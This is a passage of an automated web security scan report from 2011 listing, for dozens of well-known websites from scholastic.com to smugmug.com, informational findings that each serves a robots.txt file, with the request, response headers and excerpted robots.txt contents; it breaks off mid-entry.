24.724. http://www.scholastic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scholastic.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scholastic.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 17 Dec 2008 18:51:14 GMT
ETag: "a1c8b46f7860c91:387e"
Server: nginx/0.7.64
Content-Type: text/plain
Content-Length: 7486
Accept-Ranges: bytes
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:54:10 GMT
Connection: close
Expires: Wed, 07 Apr 2010 04:39:37 GMT

User-agent: schveritysearch
Disallow: /activities/adventure/index.htm
Disallow: /activities/asian-american/angel_island/index.htm
Disallow: /activities/asian-american/index.htm
Disallow: /activiti
...[SNIP]...
24.725. http://www.sciencedaily.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sciencedaily.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sciencedaily.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:08 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sat, 28 Aug 2010 18:41:26 GMT
Accept-Ranges: bytes
Content-Length: 172
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /ads/
Disallow: /cms/
Disallow: /scripts/
Disallow: /styles/
Disallow: /templates/
Disallow: /test/
Disallow: /intellicontact/
Disallow: /includes/
24.726. http://www.scottrade.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scottrade.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scottrade.com

Response

HTTP/1.1 200 OK
Content-Length: 260
Content-Type: text/plain
Last-Modified: Wed, 24 Mar 2010 18:33:33 GMT
Accept-Ranges: bytes
ETag: "6b15178280cbca1:2ce"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:44:39 GMT
Connection: close

User-agent: *
Disallow: /library/
Disallow: /library/css/
Disallow: /library/images/
Disallow: /library/includes/
Disallow: /library/js/
Disallow: /library/swf/
Disallow: /media/
Disallow: /me
...[SNIP]...
24.727. http://www.scout.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://www.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:5a3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Server: Pike
Date: Sat, 02 Apr 2011 13:44:51 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx
24.728. http://www.scribd.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scribd.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scribd.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:24:17 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 502
Last-Modified: Thu, 31 Mar 2011 20:01:34 GMT
Connection: close
Vary: Accept-Encoding
X-Bot: 1
Accept-Ranges: bytes

User-agent: *
Disallow: /search/
Disallow: /notifications/
Disallow: /analytics/
Disallow: /docinfo/
Disallow: /word/add_to_favorites/
Disallow: /word/comment_login/
Disallow: /word/document_url/
Disa
...[SNIP]...
24.729. http://www.sears.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sears.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sears.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "3e6c58d907d462defbff8165818e0f27:1295976381"
Last-Modified: Tue, 25 Jan 2011 17:26:21 GMT
Content-Type: text/plain
Expires: Sat, 02 Apr 2011 13:23:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:23:34 GMT
Content-Length: 3605
Connection: close
s-srvr:

# /robots.txt file for http://www.sears.com
# Version 1/25/10

User-agent: *
Disallow: /*10175
Disallow: /*10154
Disallow: /*10151
#Gift Registry
Disallow: /shc/s/CallGiftRegistryAnnouncementFormView

...[SNIP]...
24.730. http://www.seattlepi.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seattlepi.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.seattlepi.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 464
Content-Type: text/plain
ETag: "bfda8054c65bc91:fae"
Expires: Sat, 02 Apr 2011 13:32:09 GMT
Date: Sat, 02 Apr 2011 13:32:09 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:
User-agent: *
Disallow: /cgi-bin/
Disallow: /htdocs/
Disallow: /logs/
Disallow: /naa/
Disallow: /pi-cgi-bin/
Disallow: /piuser/
Disallow: /vote96/
...[SNIP]...
24.731. http://www.sendspace.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sendspace.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sendspace.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
ETag: "2438101751"
Last-Modified: Fri, 01 Apr 2011 07:15:01 GMT
Content-Length: 148
Connection: close
Date: Sat, 02 Apr 2011 14:08:28 GMT
Server: Apache

User-agent: *
Disallow: /uploadprocerr.html
Disallow: /processupload.html
Disallow: /progressloading.html
Disallow: /defaults/
Disallow: /download/
24.732. http://www.seniorpeoplemeet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seniorpeoplemeet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.seniorpeoplemeet.com

Response

HTTP/1.1 200 OK
Content-Length: 1215
Content-Type: text/plain
Content-Location: http://www.seniorpeoplemeet.com/robots.txt
Last-Modified: Thu, 03 Feb 2011 22:30:36 GMT
Accept-Ranges: bytes
ETag: "52b64efaf1c3cb1:539"
Server: Microsoft-IIS/6.0
Date: Sat, 02 Apr 2011 14:09:07 GMT
Connection: close
Set-Cookie: NSC_QN-Tfojps=ffffffff09099c8d45525d5f4f58455e445a4a423660;Version=1;Max-Age=18000;path=/;domain=.seniorpeoplemeet.com;httponly

User-agent: Mediapartners-Google*
Disallow:

User-agent: Googlebot
Disallow:

User-agent: MSNBot
Disallow:

User-agent: Slurp
Disallow:

User-agent: Teoma
Disallow:

User-agent: Ub
...[SNIP]...
24.733. http://www.sephora.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sephora.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sephora.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.8e
Last-Modified: Thu, 09 Aug 2007 22:10:30 GMT
ETag: "23a57-20c-46bb90d6"
Cteonnt-Length: 524
Content-Type: text/plain
Cache-Control: private, max-age=36514
Date: Sat, 02 Apr 2011 13:50:09 GMT
Content-Length: 524
Connection: close

#added to allow google (3/26/03)
User-agent: googlebot
Disallow: /promotion/
Disallow: /util/
Disallow: /browse/templates/components/

#added to allow Yahoo Slurp (inktomi) (3/26/03)
User-agent
...[SNIP]...
24.734. http://www.sfgate.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sfgate.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sfgate.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:16 GMT
Server: Apache/2.2.16 (Linux/SUSE) DAV/2 mod_fcgid/2.3.5 mod_perl/2.0.4 Perl/v5.12.1
Set-Cookie: Apache=173.193.214.243.1301751796949621; path=/; max-age=31536000; domain=.sfgate.com
Last-Modified: Fri, 20 Nov 2009 21:03:27 GMT
ETag: "117c9b3-448-478d3cea24f17"
Accept-Ranges: bytes
Content-Length: 1096
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/listings/
Disallow: /cgi-bin/mapquest/
Disallow: /cgi-bin/jusma/
Disallow: /cgi-bin/went/
Disallow: /chron500/
Disallow: /admin/
Disallow: /bible/
Disallow: /listings/
...[SNIP]...
24.735. http://www.shangri-la.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shangri-la.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shangri-la.com

Response

HTTP/1.0 200 OK
Content-Length: 53
Content-Type: text/plain
Content-Location: http://www.shangri-la.com/robots.txt
Last-Modified: Fri, 15 May 2009 00:35:25 GMT
Accept-Ranges: bytes
ETag: "5a45ad9f5d4c91:4a51"
Server: Microsoft-IIS/6.0
X-WebServer-By: WEB02
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: http://www.shangri-la.com
Date: Sat, 02 Apr 2011 13:44:50 GMT
Connection: close

User-Agent: *
Disallow: /Error404.aspx
Allow: /

24.736. http://www.sharebuilder.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sharebuilder.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sharebuilder.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 691
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=5BA65078457E03305501D8B37C32B700; Path=/; Domain=.sharebuilder.com
Set-Cookie: TLTSID=5BA65078457E03305501D8B37C32B700; Path=/; Domain=.sharebuilder.com
HostName: A109
Date: Sat, 02 Apr 2011 13:43:02 GMT
Connection: close


User-agent: *
Sitemap: http://www.sharebuilder.com/ShareBuilder/sitemap.xml
Disallow: /about_us/jump
Disallow: /core
Disallow: /affiliates
Disallow: /401kResearch
Disallow: /QRPResearch
Disal
...[SNIP]...
24.737. http://www.shockwave.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shockwave.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shockwave.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7a Resin/3.1.2
Last-Modified: Tue, 29 Mar 2011 15:36:04 GMT
ETag: "110522e17-fb-49fa0d16ce100"
Accept-Ranges: bytes
Content-Length: 251
Content-Type: text/plain
Cache-Control: max-age=4230
Expires: Sat, 02 Apr 2011 14:55:12 GMT
Date: Sat, 02 Apr 2011 13:44:42 GMT
Connection: close

Sitemap: http://www.shockwave.com/sitemap.xml
User-agent: *
Disallow: /error/
Disallow: /services/
Disallow: /servicemanager/
Disallow: /content/
Disallow: /member/
Disallow: /bin/
Disallow: /
...[SNIP]...
24.738. http://www.shoebuy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shoebuy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shoebuy.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 10 Mar 2010 18:40:02 GMT
ETag: "33d-a0476480"
Accept-Ranges: bytes
Content-Length: 829
Content-Type: text/plain
Expires: Sat, 02 Apr 2011 13:51:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:51:38 GMT
Connection: close
Set-Cookie: sb2=AAAAgU2XKeoAAByIAwy/Ag==; path=/; expires=Thu, 31-Mar-16 13:51:38 GMT
Set-Cookie: NSC_1-26STU9-qh10.101.208.14=ffffffff096d444545525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 14:06:38 GMT;path=/

User-agent: *
Disallow: /cgi-bin/
Disallow: /cart
Disallow: /cust
Disallow: /viewGC
Disallow: /process
Disallow: /prequest
Disallow: /chist
Disallow: /ghint
Disallow: /lists
Disallow: /webcontroller


...[SNIP]...
24.739. http://www.shop.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shop.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shop.com

Response

HTTP/1.1 200 OK
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 13:41:28 GMT
Content-Type: text/plain; charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR NID CURa OUR NOR PHY UNI DEM PRE"
Set-Cookie: AMOS_SID=_live_ticks%3D1301751688765%26live%3DOEzzp%252Eh~UZZYzZezzZwpwzhqUjzpqUmzkWjYWeqwemjXzqwh; Path=/; Domain=.shop.com;
Set-Cookie: AMOS_NS_ID=073; Path=/; Domain=.shop.com;
Set-Cookie: CC_SRCID=1119; Path=/; Domain=www.shop.com;
Set-Cookie: AMID=2232137533; Path=/; Domain=.shop.com; Expires=Tuesday, 01-Jan-38 00:00:01 GMT
Set-Cookie: CATALOGCITY_SSNLIVE260=2232137533; Path=/; Domain=.shop.com;
Content-Length: 642


User-agent: *
Disallow: /*-link_off.xhtml*
Disallow: /*main=ajax*
Disallow: /*pfdbk*
Disallow: /*ajax_price_alert*
Disallow: /*ajaxreview*
Disallow: /*ajax_lists*
Disallow: /*ccn_send_page
...[SNIP]...
24.740. http://www.shopathome.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopathome.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shopathome.com

Response

HTTP/1.1 200 OK
Content-Length: 1440
Content-Type: text/plain
Last-Modified: Mon, 07 Feb 2011 18:47:54 GMT
Accept-Ranges: bytes
ETag: "0695687f7c6cb1:bb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:26:52 GMT
Connection: close

Sitemap: http://www.shopathome.com/SiteMapIndex.xml

User-agent: *
Disallow: /Catalogs/Outclick.aspx
Disallow: /Catalogs/Checkout/
Disallow: /Privacy.aspx
Disallow: /Eula.aspx
Disallow: /Contac
...[SNIP]...
24.741. http://www.shopcompanion.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopcompanion.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shopcompanion.com

Response

HTTP/1.1 200 OK
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 14:00:36 GMT
Content-Type: text/plain; charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR NID CURa OUR NOR PHY UNI DEM PRE"
Set-Cookie: AMOS_SID=_live_ticks%3D1301752836384%26live%3DOEzzh%252Eh~WkeXhhXmzeYhzzhWpwzYYkjzzpmZqVVVWpUjzepemp; Path=/; Domain=.shopcompanion.com;
Set-Cookie: AMOS_NS_ID=049; Path=/; Domain=.shopcompanion.com;
Set-Cookie: CC_SRCID=369; Path=/; Domain=www.shopcompanion.com;
Set-Cookie: AMID=2232139882; Path=/; Domain=.shopcompanion.com; Expires=Tuesday, 01-Jan-38 00:00:01 GMT
Set-Cookie: CATALOGCITY_SSNLIVE111=2232139882; Path=/; Domain=.shopcompanion.com;
Content-Length: 778


User-agent: *
Disallow: /*-link_off.xhtml*
Disallow: /*main=ajax*
Disallow: /*pfdbk*
Disallow: /*ajax_price_alert*
Disallow: /*ajaxreview*
Disallow: /*ajax_lists*
Disallow: /*ccn_send_page
...[SNIP]...
24.742. http://www.shopping.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shopping.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Sat, 02 Apr 2011 13:26:23 GMT
Connection: close

User-agent: *
Disallow: /sdcSeo
Disallow: /*?all
Disallow: /*&all
24.743. http://www.shopstyle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopstyle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shopstyle.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:49 GMT
Server: Apache/2.2.13 (Unix)
Last-Modified: Thu, 07 Oct 2010 00:19:09 GMT
Accept-Ranges: bytes
Content-Length: 2307
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Connection: close
Content-Type: text/plain; charset=UTF-8

#
# NOTE WE MAINTAIN MANY OF THESE: KEEP THEM IN SYNC
#

# www.apptus.com's crawler generates many exceptions
User-agent: apptus_tce
Disallow: /

# www.apptus.com's crawler generates many exceptions
U
...[SNIP]...
24.744. http://www.shopzilla.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopzilla.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shopzilla.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: trafficSourceDebugParam=; Domain=.shopzilla.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="NON DSP ADM DEV PSD CUSo OUR IND STP PRE NAV UNI"
Pragma:
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control:
Set-Cookie: sessionid=720212189460109582; Domain=.shopzilla.com; Expires=Sun, 03-Apr-2011 13:26:22 GMT; Path=/
Set-Cookie: br=13017507824562226718502020102025238; Domain=.shopzilla.com; Expires=Tue, 30-Mar-2021 13:26:22 GMT; Path=/
Set-Cookie: _data=_time%3A%3Astart_time%3D1301750782%3Btimestamp%3D1301750782%7Ctracker%3A%3Ahtcnt%3D1%3Brf%3Dwlk; Domain=.shopzilla.com; Expires=Sun, 03-Apr-2011 13:26:22 GMT; Path=/
Set-Cookie: rng=3282754; Domain=.shopzilla.com; Expires=Sun, 03-Apr-2011 13:26:22 GMT; Path=/
ETag: W/"2835-1299516992000"
Last-Modified: Mon, 07 Mar 2011 16:56:32 GMT
Content-Type: text/plain;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2835
Date: Sat, 02 Apr 2011 13:26:22 GMT
Connection: close

User-Agent: *
Disallow: /rd2
Disallow: /rd
Disallow: /mybizrate/
Disallow: /color_bumper.xpml
Disallow: /RetailStores
Disallow: /ProductReserve

#
# Crawlers that are kind enough to obey, but which we
...[SNIP]...
24.745. http://www.shutterfly.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shutterfly.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shutterfly.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:00 GMT
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa TAIa PSAa PSDa OUR BUS ONL COM NAV INT STA PRE UNI"
Accept-Ranges: bytes
ETag: W/"662-1300301336000"
Last-Modified: Wed, 16 Mar 2011 18:48:56 GMT
Content-Type: text/plain
Content-Length: 662
Set-Cookie: JSESSIONID=FE2F7103244DD1545EFB305E0E2AAC7A; Path=/
Set-Cookie: sflyversion="E"; Domain=.shutterfly.com; Path=/
Set-Cookie: masterServer="serverName:www.shutterfly.com&sessionId:FE2F7103244DD1545EFB305E0E2AAC7A&serverIP:172.16.113.79"; Domain=.shutterfly.com; Path=/
Set-Cookie: visitor="9c88f3aa-5d2c-11e0-b15f-a9cda24195d1"; Domain=.shutterfly.com; Expires=Fri, 27-Dec-2013 13:25:00 GMT; Path=/
Set-Cookie: lb=qymEPJg3-app196; Path=/
Set-Cookie: BIGipServerAPP-B-LR=1332809900.20480.0000; path=/
Connection: close

# Tells Scanning Robots Where They Are And Are Not Welcome
#
# User-agent: can also specify by name; "*" is for everyone
# Disallow: disallow if this matches first part of requested path
#

User
...[SNIP]...
24.746. http://www.simon.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.simon.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.simon.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 03 Aug 2010 16:57:57 GMT
Accept-Ranges: bytes
ETag: "87c79d52d33cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 02 Apr 2011 14:09:19 GMT
Connection: close
Content-Length: 53

User-Agent: *
Disallow: /errors/
Disallow: /Assets/
24.747. http://www.simplyhired.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.simplyhired.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.simplyhired.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 12:44:07 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Length: 864
Via: Simply Cache

User-agent: *
Disallow: /a/legal/
Disallow: /a/job-feed/rss/
Disallow: /a/job-details/view/
Disallow: /a/jump/to/
Disallow: /a/error/
User-agent: Slurp
Disallow: /a/legal/
Disallow: /a/job-feed/rss/
D
...[SNIP]...
24.748. http://www.sing365.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sing365.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sing365.com

Response

HTTP/1.0 200 OK
Server: Lotus-Domino
Date: Sat, 02 Apr 2011 05:28:08 GMT
Content-Type: text/plain
Content-Length: 161
Last-Modified: Mon, 26 Feb 2007 07:55:08 GMT
Accept-Ranges: bytes
Connection: close

User-agent: Googlebot
Disallow: /*?*
Disallow: /*unid*
Disallow: /*Unid*
Disallow: /*singerAll*
Disallow: /*SingerAll*
Disallow: /*/0/*
Disallow: /*archive.nsf*
24.749. http://www.singlesnet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.singlesnet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.singlesnet.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:50:16 GMT
Content-Type: text/plain
Content-Length: 24
Last-Modified: Wed, 30 Mar 2011 17:43:05 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

User-agent: *
Disallow:
24.750. http://www.sky.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sky.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sky.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 16 Mar 2011 14:59:02 GMT
Content-Type: text/plain; charset=UTF-8
ETag: "pv8851dd55398c6783e38952c8d3a56e1f"
Expires: Sat, 02 Apr 2011 12:17:17 GMT
Cache-Control: max-age=60
X-PvInfo: [S10204.C10879.A67423.RA0.G10818.U43A35DEE].[OT/plaintext.OG/documents]
Date: Sat, 02 Apr 2011 13:59:15 GMT
Content-Length: 1165
Connection: close

User-agent: *
# Older file
Disallow: /portal/site/skybb/search
# New File
Disallow: /cgi/
Disallow: /Account_Billing/
Disallow: /Assets/
Disallow: /Getting_Started/
Disallow: /How_To_Get_Sky/
Disallow
...[SNIP]...
24.751. http://www.skype.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.skype.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:14 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 12:03:15 GMT
ETag: "a2-48b8000f566c0"
Accept-Ranges: bytes
Content-Length: 162
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Language: en

User-agent: *
Disallow: /temp/
Disallow: /store/accessories/
Disallow: */downloading/
Disallow: /go/help.ticket.submit$

Sitemap: http://www.skype.com/sitemap.xml
24.752. http://www.slate.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.slate.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.slate.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=600
Content-Length: 535
Content-Type: text/plain
Last-Modified: Wed, 17 Nov 2010 22:56:26 GMT
Accept-Ranges: bytes
ETag: "089b5a9aa86cb1:eb5"
Server: Microsoft-IIS/6.0
Date: Sat, 02 Apr 2011 13:30:58 GMT
Connection: close

User-agent: *
Disallow: /id/3936/
Disallow: /id/3944/
Disallow: /id/2068034/
Disallow: /id/76816/
Disallow: /id/85223/
Disallow: /id/76816/
Disallow: /id/2057494/
Disallow: /id/2059043/
Disal
...[SNIP]...
24.753. http://www.slide.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.slide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.slide.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:27:09 GMT
Server: Apache/2.2
Last-Modified: Wed, 19 Nov 2008 22:04:06 GMT
Vary: Accept-Encoding
X-Host: wb0.la1
Content-Length: 620
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /accept
Disallow: /addphotos
Disallow: /arrange
Disallow: /channel_finder
Disallow: /channelajax
Disallow: /display_trackback
Disallow: /feedback
Disallow: /i/
Disallow: /ifram
...[SNIP]...
24.754. http://www.slideshare.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.slideshare.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.slideshare.net

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Content-Type: text/plain
Last-Modified: Fri, 01 Apr 2011 18:28:13 GMT
Content-Length: 284
Date: Sat, 02 Apr 2011 13:37:27 GMT
X-Varnish: 2056362666 2056357499
Age: 30
Via: 1.1 varnish
Connection: close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt fil
#User-agent: Slurp
#Crawl-delay: 5

Sitemap: http://www.slideshare.net/sitemap.xml
User-agent: *
Disa
...[SNIP]...
24.755. http://www.smarter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smarter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.smarter.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:09 GMT
Server: Apache
Static-Dir-Bind: robots.txt, /mezi/sites/smarter.com/code/web/, /
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 14:32:09 GMT
ETag: "284cef529dd182c1fdd9a7b32246653c"
Loader-Time-Used: 0.00085
Vary: Accept-Encoding,User-Agent
Content-Length: 2346
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow:/*--sb*
Disallow:/abusereview.php
Disallow:/accountsetting.php
Disallow:/ads.php
Disallow:/agreement.php
Disallow:/allbrands.php
Disallow:/allstores.php
Disallow:/apparel/produc
...[SNIP]...
24.756. http://www.smilebox.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smilebox.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.smilebox.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:04 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 00:50:30 GMT
ETag: "14f8112-c4-494074fb84180"
Accept-Ranges: bytes
Content-Length: 196
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /_mm/
Disallow: /go/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

Sitemap: http://www.smilebox.com/sitemap.xml
24.757. http://www.smugmug.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smugmug.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

